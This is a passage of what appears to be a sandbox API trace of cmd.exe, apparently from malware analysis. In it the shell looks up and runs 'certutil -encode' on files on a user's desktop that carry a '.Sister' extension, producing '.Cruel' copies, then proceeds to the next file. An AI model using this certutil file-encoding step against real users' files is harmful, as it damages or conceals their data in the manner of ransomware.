lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x48) returned 1 [0206.617] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0206.617] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.617] GetFileType (hFile=0x50) returned 0x2 [0206.618] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0206.618] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0206.618] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.618] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0206.624] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0206.624] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0206.624] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0206.624] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0206.624] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0206.624] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0206.624] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0206.624] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0206.624] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0206.624] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0206.625] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0206.625] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0206.625] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0206.625] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0206.625] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0206.625] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0206.625] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0206.625] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0206.625] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0206.625] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0206.625] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0206.625] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0206.625] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0206.625] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0206.625] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0206.625] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0206.625] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0206.625] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0206.625] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0206.625] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0206.625] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0206.625] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0206.625] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0206.625] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0206.625] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0206.625] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0206.625] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0206.625] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0206.625] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0206.625] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0206.625] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0206.625] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0206.625] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0206.625] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0206.625] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0206.626] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0206.626] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0206.626] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0206.626] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0206.626] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0206.626] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0206.626] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0206.626] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0206.626] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0206.626] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0206.626] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0206.626] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0206.626] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0206.626] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0206.626] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0206.626] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0206.626] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0206.626] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0206.626] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0206.626] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0206.626] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0206.626] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0206.626] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0206.626] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0206.626] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0206.626] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0206.626] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0206.626] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0206.626] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0206.626] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0206.626] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0206.626] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0206.626] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0206.627] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0206.627] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0206.627] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0206.627] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0206.627] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0206.627] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0206.627] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0206.627] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0206.627] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0206.627] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0206.627] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0206.627] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0206.627] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0206.627] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0206.627] ??_V@YAXPEAX@Z () returned 0x1 [0206.627] GetProcessHeap () returned 0x21ed8c70000 [0206.627] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92800f0 [0206.628] GetProcessHeap () returned 0x21ed8c70000 [0206.628] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c96880 [0206.629] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0206.629] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0206.629] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0206.629] GetProcessHeap () returned 0x21ed8c70000 [0206.629] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9380080 [0206.631] SetErrorMode (uMode=0x0) returned 0x0 [0206.631] SetErrorMode (uMode=0x1) returned 0x0 [0206.631] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9380090, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0206.632] SetErrorMode (uMode=0x0) returned 0x1 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9380080, Size=0x52) returned 0x21ed9380080 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9380080) returned 0x52 [0206.632] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0206.632] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64c00 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d42620 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42620, Size=0x1be) returned 0x21ed8d42620 [0206.632] GetProcessHeap () returned 0x21ed8c70000 [0206.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d42620) returned 0x1be [0206.632] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0206.633] GetProcessHeap () returned 0x21ed8c70000 [0206.633] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c758a0 [0206.633] GetProcessHeap () returned 0x21ed8c70000 [0206.633] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x7e) returned 0x21ed8c758a0 [0206.633] GetProcessHeap () returned 0x21ed8c70000 [0206.633] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x7e [0206.633] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.633] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0206.633] GetLastError () returned 0x2 [0206.633] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.633] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0206.633] GetLastError () returned 0x2 [0206.634] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.634] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cfa0 [0206.634] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0206.634] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0206.634] GetLastError () returned 0x2 [0206.634] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cd60 [0206.634] FindClose (in: hFindFile=0x21ed8c7cd60 | out: hFindFile=0x21ed8c7cd60) returned 1 [0206.634] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.634] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.634] ??_V@YAXPEAX@Z () returned 0x1 [0206.634] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0206.635] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0206.635] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0206.635] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0206.635] GetProcessHeap () returned 0x21ed8c70000 [0206.635] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0206.635] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0206.635] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0206.635] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0206.635] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0206.635] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0206.636] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0206.637] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0206.637] GetProcessHeap () returned 0x21ed8c70000 [0206.637] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0206.637] GetProcessHeap () returned 0x21ed8c70000 [0206.637] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95600 [0206.637] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.637] _get_osfhandle (_FileHandle=1) returned 0x50 [0206.637] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0206.637] _get_osfhandle (_FileHandle=0) returned 0x4c [0206.637] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0206.638] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.ods.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xfe0, dwThreadId=0x1354)) returned 1 [0206.647] CloseHandle (hObject=0xa8) returned 1 [0206.647] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.647] GetProcessHeap () returned 0x21ed8c70000 [0206.647] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0206.647] GetEnvironmentStringsW () returned 0x21ed9980080* [0206.648] GetProcessHeap () returned 0x21ed8c70000 [0206.648] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0206.648] FreeEnvironmentStringsA (penv="=") returned 1 [0206.648] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0207.014] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0207.014] CloseHandle (hObject=0xa4) returned 1 [0207.015] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0207.015] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0207.015] GetProcessHeap () returned 0x21ed8c70000 [0207.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0207.015] GetEnvironmentStringsW () returned 0x21ed9980080* [0207.015] GetProcessHeap () returned 0x21ed8c70000 [0207.015] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0207.015] FreeEnvironmentStringsA (penv="=") returned 1 [0207.015] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0207.015] GetProcessHeap () returned 0x21ed8c70000 [0207.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0207.015] GetEnvironmentStringsW () returned 0x21ed9980080* [0207.015] GetProcessHeap () returned 0x21ed8c70000 [0207.015] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0207.016] FreeEnvironmentStringsA (penv="=") returned 1 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95600) returned 1 [0207.016] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0207.016] ??_V@YAXPEAX@Z () returned 0x1 [0207.016] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="23wggka_3I9jMmhYgMoj.jpg.Sister", cAlternateFileName="")) returned 1 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d2a0, Size=0xcc) returned 0x21ed8c75930 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75930) returned 0xcc [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d561d0 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d561d0, Size=0x58) returned 0x21ed8d561d0 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d561d0) returned 0x58 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56240 [0207.016] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0207.016] GetProcessHeap () returned 0x21ed8c70000 [0207.016] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7ca00 [0207.016] ??_V@YAXPEAX@Z () returned 0x1 [0207.016] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0207.017] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0207.017] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0207.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0207.017] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0207.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa5f45773, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa5f45773, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0207.017] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0207.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="23wggka_3I9jMmhYgMoj.jpg.Sister", cAlternateFileName="23WGGK~1.SIS")) returned 0x21ed8c7d0c0 [0207.018] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0207.018] _wcsnicmp (_String1="23WGGK~1.SIS", _String2="23wggka_3I9jMmhYgMoj.jpg.Sister", _MaxCount=0x1f) returned 29 